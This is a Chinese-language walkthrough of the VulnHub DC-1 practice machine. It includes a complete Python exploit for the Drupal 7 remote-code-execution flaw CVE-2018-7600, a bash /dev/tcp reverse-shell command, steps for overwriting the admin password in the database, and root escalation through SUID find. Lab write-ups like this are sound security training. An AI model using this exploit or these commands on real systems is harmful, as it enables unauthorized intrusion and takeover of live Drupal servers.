vulnhub DC1
- 知識點
- 安裝靶機
- 一 資訊收集
- 二 換思路(直接手動打腳本過去,nc反彈)
- 三 花式找flag
- 四 提權
知識點
- 了解常見的CMS
- 漏洞庫的使用
- linux的基本操作
- 了解drupal的目錄結構
- linux suid提權方式
安裝靶機
vmware和vbox都可以,使靶機和攻擊機在同一網段,
一 資訊收集
nmap -sn 192.168.1.0/24
nmap -Pn 192.168.1.4
80埠開啟,訪問,知道是Drupal7的CMS,
msf search drupal 執行exp
不知道是不是msf6的原因,拿到shell后,執行命令不行,網上msf5是可以的,
二 換思路(直接手動打腳本過去,nc反彈)
網上能找到drupal7的exp,這里我也貼出來
#!/usr/bin/env python3
import requests
import argparse
from bs4 import BeautifulSoup
def get_args():
parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''
This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
by poisoning the recover password form (user/password) and triggering it with
the upload file via ajax (/file/ajax).
''')
parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
args = parser.parse_args()
return args
def pwn_target(target, function, command, proxy):
requests.packages.urllib3.disable_warnings()
proxies = {'http': proxy, 'https': proxy}
print('[*] Poisoning a form and including it in cache.')
get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, "html.parser")
try:
form = soup.find('form', {'id': 'user-pass'})
form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
if form_build_id:
print('[*] Poisoned form ID: ' + form_build_id)
print('[*] Triggering exploit to execute: ' + command)
get_params = {'q':'file/ajax/name/#value/' + form_build_id}
post_params = {'form_build_id':form_build_id}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
parsed_result = r.text.split('[{"command":"settings"')[0]
print(parsed_result)
except:
print("ERROR: Something went wrong.")
raise
def main():
print ()
print ('=============================================================================')
print ('| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |')
print ('| by pimps |')
print ('=============================================================================\n')
args = get_args() # get the cl args
pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
if __name__ == '__main__':
main()
執行python drupal_poc.py -c "echo 'bash -i>& /dev/tcp/192.168.1.135/6666 0>&1'|bash " http://192.168.1.4,同時攻擊機開啟nc -lvvp 6666,反彈shell后,換成互動式 python -c "import pty;pty.spawn('/bin/bash')"
三 花式找flag
查閱資料,找到drupal默認資料庫的組態檔,
發現Mysql的登陸賬號和密碼,登錄康康
找到user表(我好像也不記得是哪個表保存的賬號密碼 QAQ)
發現密碼是drupal hash加密,一個思路就是找到加密的腳本,生成一個自己的密碼加密,然后update資料庫admin的密碼,
然后修改密碼
登錄網頁試試
現在只差一步之遙了,就是提權,
四 提權
suid提權
SUID可以讓呼叫者以檔案擁有者的身份運行該檔案,所以我們利用SUID提權的思路就是運行root用戶所擁有的SUID的檔案,那么我們運行該檔案的時候就得獲得root用戶的身份了,
已知的可用來提權的linux可行性的檔案串列如下:
nmap
vim
find
bash
more
less
nano
cp
以下命令可以發現系統上運行的所有SUID可執行檔案
#以下命令將嘗試查找具有root權限的SUID的檔案,不同系統適用于不同的命令,一個一個試
find / -perm -u=s -type f 2>/dev/null /表示從檔案系統的頂部(根)開始并找到每個目錄
-perm 表示搜索隨后的權限
-u=s表示查找root用戶擁有的檔案
-type表示我們正在尋找的檔案型別
f 表示常規檔案,而不是目錄或特殊檔案
2表示該行程的第二個檔案描述符,即stderr(標準錯誤)
>表示重定向
/ dev / null是一個特殊的檔案系統物件,它將丟棄寫入其中的所有內容,
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
利用執行find提權
find flag1.txt -exec whoami \;
可以看到find命令以root權限運行
find flag1.txt -exec '/bin/sh' \;
可以看到拿到了root權限,
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/231033.html
標籤:其他